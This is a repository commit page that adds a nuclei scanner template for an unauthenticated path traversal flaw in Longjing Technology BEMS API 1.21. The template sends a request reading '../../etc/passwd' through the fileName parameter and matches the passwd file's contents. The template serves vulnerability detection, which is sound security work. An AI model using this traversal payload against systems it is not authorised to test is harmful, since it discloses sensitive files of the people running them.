daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2318 from gy741/rule-add-v50 

Create longjing-technology-bems-api-lfi.yaml
patch-1
Prince Chaddha 2021-08-03 19:56:57 +05:30 committed by GitHub
parent 23bc448b1b 28d568b88c
commit c581a94bf4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
vulnerabilities/other/bems-api-lfi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: bems-api-lfi
info:
name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
author: gy741
severity: high
description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
tags: lfi
requests:
- method: GET
path:
- "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200